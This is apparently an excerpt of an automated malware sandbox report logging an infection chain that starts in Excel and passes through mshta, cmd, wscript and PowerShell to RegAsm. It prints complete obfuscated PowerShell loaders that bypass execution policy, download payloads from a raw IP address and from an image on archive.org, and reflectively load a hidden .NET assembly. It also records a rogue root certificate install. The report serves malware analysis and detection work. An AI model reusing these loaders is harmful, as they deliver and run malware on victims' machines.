                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PoweRshElL -eX bypaSS -NOp -W 1 -c devicEcREdEnTiaLDePloyment ; ieX($(IeX('[SYSTem.tEXt.EnCOdiNG]'+[CHar]0X3A+[cHaR]0x3a+'Utf8.GEtSTRINg([SYSTem.coNVeRT]'+[cHaR]58+[CHaR]58+'FroMbaSE64StriNg('+[CHar]0X22+'JFVEcFcyQ0dRM0RLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJFckRlRklOSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdE1ZbUpnaixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtRnlWTWhXLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGV6WEVQaix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmVpeGRab1ZELEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG11bGNlZkJaKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiRCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZXNQYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVGhTY0hVSUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFVEcFcyQ0dRM0RLOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjIwLjQwLzMzMC92ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnRJRiIsIiRlTlY6QVBQREFUQVx2ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnZiUyIsMCwwKTtTVGFyVC1TbEVFUCgzKTtTdGFSdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcdmVyeWJlc3R0aGluZ3N3ZXNoYXJlZGZvcm5ldy52YlMi'+[ChaR]34+'))')))"Jump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezF9aW1hZ2VVcmwnKycgPSAnKyd7MH1odHRwczovL2lhNjAwMTAyLnVzLmFyY2hpdmUub3JnLzMyL2l0ZW1zL2RldGFoLW5vdGUtdl8yMDI0MTAvRGV0YWhOb3QnKydlX1YuanBnIHswfTt7MX13ZWJDJysnbGllbnQgPSBOJysnZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O3sxfWltJysnYWdlQnl0ZXMgPSB7MX13ZWJDbGllbnQnKycuRG93bmxvYWREYXRhKHsxfWltYWdlVScrJ3JsKTt7MX1pbWFnZVRleHQgPSBbU3lzdGVtLlQnKydleHQuJysnRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyh7MX1pbWFnZUJ5dGVzKTt7JysnMX1zdGFydEZsYWcgPSB7MH08JysnPEJBU0U2NF9TVEFSVD4+ezB9JysnO3sxfWVuZEZsYWcgPSB7MH08PEJBU0U2NF9FTkQ+PnswfTt7MX1zdGFydEluZGV4ID0gezF9aW1hZ2VUZXh0LkluZGV4T2YoezF9c3RhcnRGbGFnKTt7MX1lbmRJbmRleCA9IHsxfWltYWdlVGV4dC4nKydJbmRleE9mKHsxfWVuZEZsYWcpO3sxfXN0YXJ0SW5kZXggJysnLWdlIDAgLWFuZCB7MX0nKydlbmRJbmRleCAtZ3QgezF9c3RhcnRJbmRleDt7MX1zdGFydEluZGV4ICs9IHsxfXN0YXJ0RmxhZy5MZW5ndGg7eycrJzF9YmEnKydzZTY0TGVuZ3RoID0gezEnKyd9ZW5kSW5kZXggLSB7MX1zdGFydEluZGV4O3sxfWJhc2U2NENvbW1hbmQgPSB7MX1pbWFnZVRleHQuU3Vic3RyaW5nKHsxfXN0YXJ0SW5kZXgsIHsxfWJhc2U2NExlbmd0aCk7ezF9Y29tbWFuZEJ5dGVzICcrJz0gW1N5cycrJ3RlbS5Db252ZXJ0XTo6RnJvJysnbUJhc2U2NFMnKyd0cmluZyh7MX1iYXNlNjRDb21tYW5kKTt7MX1sb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0nKycuUmVmbGVjdGlvbi5Bc3NlbWJsJysneV06OkxvYWQoezF9Y29tbWFuZEJ5dGVzKTt7MX12YWlNZXRob2QgPSBbZG5sJysnaWIuSU8uSG9tZV0uR2V0TWV0aG9kKHswfVZBSXswfSk7ezF9dmFpTWV0aG9kLkknKydudm9rZSh7MX1udWxsLCBAKHswfXR4dC5IR0dDUlIvMDMzLzA0LjAyMi4zLjI5MS8vJysnOnB0dGh7MH0sIHswfWRlc2F0aXZhZG97MH0sIHswfWRlc2F0aXZhZG97MH0sICcrJ3swfWRlcycrJ2F0aXZhZG97MH0sIHswfVJlZ0FzbXswfSwgezB9ZGVzYXRpdmFkb3snKycwfSwgezB9ZGVzYXRpdmFkb3swfSkpOycpICAtRiBbQ2hhcl0zOSxbQ2hhcl0zNil8IGludm9rZS1leHByZXNTSW9u';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{1}imageUrl'+' = '+'{0}https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNot'+'e_V.jpg {0};{1}webC'+'lient = N'+'ew-Object System.Net.WebClient;{1}im'+'ageBytes = {1}webClient'+'.DownloadData({1}imageU'+'rl);{1}imageText = [System.T'+'ext.'+'Encoding]::UTF8.GetString({1}imageBytes);{'+'1}startFlag = {0}<'+'<BASE64_START>>{0}'+';{1}endFlag = {0}<<BASE64_END>>{0};{1}startIndex = {1}imageText.IndexOf({1}startFlag);{1}endIndex = {1}imageText.'+'IndexOf({1}endFlag);{1}startIndex '+'-ge 0 -and {1}'+'endIndex -gt {1}startIndex;{1}startIndex += {1}startFlag.Length;{'+'1}ba'+'se64Length = {1'+'}endIndex - {1}startIndex;{1}base64Command = {1}imageText.Substring({1}startIndex, {1}base64Length);{1}commandBytes '+'= [Sys'+'tem.Convert]::Fro'+'mBase64S'+'tring({1}base64Command);{1}loadedAssembly = [System'+'.Reflection.Assembl'+'y]::Load({1}commandBytes);{1}vaiMethod = [dnl'+'ib.IO.Home].GetMethod({0}VAI{0});{1}vaiMethod.I'+'nvoke({1}null, @({0}txt.HGGCRR/033/04.022.3.291//'+':ptth{0}, {0}desativado{0}, {0}desativado{0}, '+'{0}des'+'ativado{0}, {0}RegAsm{0}, {0}desativado{'+'0}, {0}desativado{0}));') -F [Char]39,[Char]36)| invoke-expresSIon"Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PoweRshElL -eX bypaSS -NOp -W 1 -c devicEcREdEnTiaLDePloyment ; ieX($(IeX('[SYSTem.tEXt.EnCOdiNG]'+[CHar]0X3A+[cHaR]0x3a+'Utf8.GEtSTRINg([SYSTem.coNVeRT]'+[cHaR]58+[CHaR]58+'FroMbaSE64StriNg('+[CHar]0X22+'JFVEcFcyQ0dRM0RLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJFckRlRklOSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdE1ZbUpnaixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtRnlWTWhXLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGV6WEVQaix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmVpeGRab1ZELEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG11bGNlZkJaKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiRCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZXNQYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVGhTY0hVSUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFVEcFcyQ0dRM0RLOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjIwLjQwLzMzMC92ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnRJRiIsIiRlTlY6QVBQREFUQVx2ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnZiUyIsMCwwKTtTVGFyVC1TbEVFUCgzKTtTdGFSdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcdmVyeWJlc3R0aGluZ3N3ZXNoYXJlZGZvcm5ldy52YlMi'+[ChaR]34+'))')))"
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezF9aW1hZ2VVcmwnKycgPSAnKyd7MH1odHRwczovL2lhNjAwMTAyLnVzLmFyY2hpdmUub3JnLzMyL2l0ZW1zL2RldGFoLW5vdGUtdl8yMDI0MTAvRGV0YWhOb3QnKydlX1YuanBnIHswfTt7MX13ZWJDJysnbGllbnQgPSBOJysnZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O3sxfWltJysnYWdlQnl0ZXMgPSB7MX13ZWJDbGllbnQnKycuRG93bmxvYWREYXRhKHsxfWltYWdlVScrJ3JsKTt7MX1pbWFnZVRleHQgPSBbU3lzdGVtLlQnKydleHQuJysnRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyh7MX1pbWFnZUJ5dGVzKTt7JysnMX1zdGFydEZsYWcgPSB7MH08JysnPEJBU0U2NF9TVEFSVD4+ezB9JysnO3sxfWVuZEZsYWcgPSB7MH08PEJBU0U2NF9FTkQ+PnswfTt7MX1zdGFydEluZGV4ID0gezF9aW1hZ2VUZXh0LkluZGV4T2YoezF9c3RhcnRGbGFnKTt7MX1lbmRJbmRleCA9IHsxfWltYWdlVGV4dC4nKydJbmRleE9mKHsxfWVuZEZsYWcpO3sxfXN0YXJ0SW5kZXggJysnLWdlIDAgLWFuZCB7MX0nKydlbmRJbmRleCAtZ3QgezF9c3RhcnRJbmRleDt7MX1zdGFydEluZGV4ICs9IHsxfXN0YXJ0RmxhZy5MZW5ndGg7eycrJzF9YmEnKydzZTY0TGVuZ3RoID0gezEnKyd9ZW5kSW5kZXggLSB7MX1zdGFydEluZGV4O3sxfWJhc2U2NENvbW1hbmQgPSB7MX1pbWFnZVRleHQuU3Vic3RyaW5nKHsxfXN0YXJ0SW5kZXgsIHsxfWJhc2U2NExlbmd0aCk7ezF9Y29tbWFuZEJ5dGVzICcrJz0gW1N5cycrJ3RlbS5Db252ZXJ0XTo6RnJvJysnbUJhc2U2NFMnKyd0cmluZyh7MX1iYXNlNjRDb21tYW5kKTt7MX1sb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0nKycuUmVmbGVjdGlvbi5Bc3NlbWJsJysneV06OkxvYWQoezF9Y29tbWFuZEJ5dGVzKTt7MX12YWlNZXRob2QgPSBbZG5sJysnaWIuSU8uSG9tZV0uR2V0TWV0aG9kKHswfVZBSXswfSk7ezF9dmFpTWV0aG9kLkknKydudm9rZSh7MX1udWxsLCBAKHswfXR4dC5IR0dDUlIvMDMzLzA0LjAyMi4zLjI5MS8vJysnOnB0dGh7MH0sIHswfWRlc2F0aXZhZG97MH0sIHswfWRlc2F0aXZhZG97MH0sICcrJ3swfWRlcycrJ2F0aXZhZG97MH0sIHswfVJlZ0FzbXswfSwgezB9ZGVzYXRpdmFkb3snKycwfSwgezB9ZGVzYXRpdmFkb3swfSkpOycpICAtRiBbQ2hhcl0zOSxbQ2hhcl0zNil8IGludm9rZS1leHByZXNTSW9u';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{1}imageUrl'+' = '+'{0}https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNot'+'e_V.jpg {0};{1}webC'+'lient = N'+'ew-Object System.Net.WebClient;{1}im'+'ageBytes = {1}webClient'+'.DownloadData({1}imageU'+'rl);{1}imageText = [System.T'+'ext.'+'Encoding]::UTF8.GetString({1}imageBytes);{'+'1}startFlag = {0}<'+'<BASE64_START>>{0}'+';{1}endFlag = {0}<<BASE64_END>>{0};{1}startIndex = {1}imageText.IndexOf({1}startFlag);{1}endIndex = {1}imageText.'+'IndexOf({1}endFlag);{1}startIndex '+'-ge 0 -and {1}'+'endIndex -gt {1}startIndex;{1}startIndex += {1}startFlag.Length;{'+'1}ba'+'se64Length = {1'+'}endIndex - {1}startIndex;{1}base64Command = {1}imageText.Substring({1}startIndex, {1}base64Length);{1}commandBytes '+'= [Sys'+'tem.Convert]::Fro'+'mBase64S'+'tring({1}base64Command);{1}loadedAssembly = [System'+'.Reflection.Assembl'+'y]::Load({1}commandBytes);{1}vaiMethod = [dnl'+'ib.IO.Home].GetMethod({0}VAI{0});{1}vaiMethod.I'+'nvoke({1}null, @({0}txt.HGGCRR/033/04.022.3.291//'+':ptth{0}, {0}desativado{0}, {0}desativado{0}, '+'{0}des'+'ativado{0}, {0}RegAsm{0}, {0}desativado{'+'0}, {0}desativado{0}));') -F [Char]39,[Char]36)| invoke-expresSIon"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uvrrkyhh\uvrrkyhh.cmdline"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lkzgbmkm\lkzgbmkm.cmdline"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uvrrkyhh\uvrrkyhh.cmdline"Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lkzgbmkm\lkzgbmkm.cmdline"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 30_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,30_2_0041CBE1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_000007FE8995022D push eax; iretd 7_2_000007FE89950241
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_000007FE8992223D push eax; ret 14_2_000007FE89922271
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_000007FE8992022D push eax; iretd 14_2_000007FE89920241
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_10002806 push ecx; ret 17_2_10002819
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_0044693D push ecx; ret 21_2_0044694D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_0044DB70 push eax; ret 21_2_0044DB84
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_0044DB70 push eax; ret 21_2_0044DBAC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_00451D54 push eax; ret 21_2_00451D61
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 23_2_0044B090 push eax; ret 23_2_0044B0A4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 23_2_0044B090 push eax; ret 23_2_0044B0CC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 23_2_00451D34 push eax; ret 23_2_00451D41
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 23_2_00444E71 push ecx; ret 23_2_00444E81
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_00414060 push eax; ret 24_2_00414074
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_00414060 push eax; ret 24_2_0041409C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_00414039 push ecx; ret 24_2_00414049
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_004164EB push 0000006Ah; retf 24_2_004165C4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_00416553 push 0000006Ah; retf 24_2_004165C4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_00416555 push 0000006Ah; retf 24_2_004165C4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 30_2_004470B7 push eax; retf 0046h30_2_004470B8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 30_2_00457186 push ecx; ret 30_2_00457199
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 30_2_0045E55D push esi; ret 30_2_0045E566
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 30_2_00457AA8 push eax; ret 30_2_00457AC6
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 30_2_00434EB6 push ecx; ret 30_2_00434EC9

                    Persistence and Installation Behavior

                    barindex
                    Installs new ROOT certificates
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 30_2_00406EEB ShellExecuteW,URLDownloadToFileW,30_2_00406EEB
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\uvrrkyhh\uvrrkyhh.dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\lkzgbmkm\lkzgbmkm.dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 30_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,30_2_0041AADB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 30_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,30_2_0041CBE1
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
